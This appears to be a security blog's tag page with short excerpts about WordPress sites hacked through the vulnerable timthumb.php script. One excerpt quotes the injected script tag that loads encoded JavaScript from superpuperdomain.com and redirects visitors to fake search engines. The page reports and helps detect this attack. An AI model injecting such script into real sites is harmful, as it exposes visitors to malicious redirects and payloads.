The Latest in IT Security

Posts Tagged ‘theme authors’

A few days ago we posted about a series of attacks that were happening against WordPress sites running the vulnerable timthumb.php script. We detected thousands of sites compromised with it and now are are seeing a small change in the malware. Instead of superpuperdomain.com, the malware is now pointing to a remote javascript from superpuperdomain2.com […]

Read more ...

We are seeing a large number of WordPress sites compromised with a malicious JavaScript loading from superpuperdomain.com/count.php. That JavaScript redirects visitors that were going to the WordPress site to fake search engines. This is what shows up at the bottom of the hacked sites: <script language=”javascript” SRC=”http://superpuperdomain.com/count.php?ref=http%3A%2F%2Fsite.com%2Fdif%2F”></script> This script basically loads a bunch of encoded JavaScript that […]

Read more ...

There has been some buzz about a zero day vulnerability found in Timthumb.php that can allow for arbitrary file uploads. Although this is a platform independent issue, it is specially an issue on WordPress where a lot of theme authors choose to include scripts in themes without any extra security measures. You can read more […]

Read more ...


Categories

FRIDAY, MARCH 29, 2024
WHITE PAPERS

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...

Featured

Archives

Latest Comments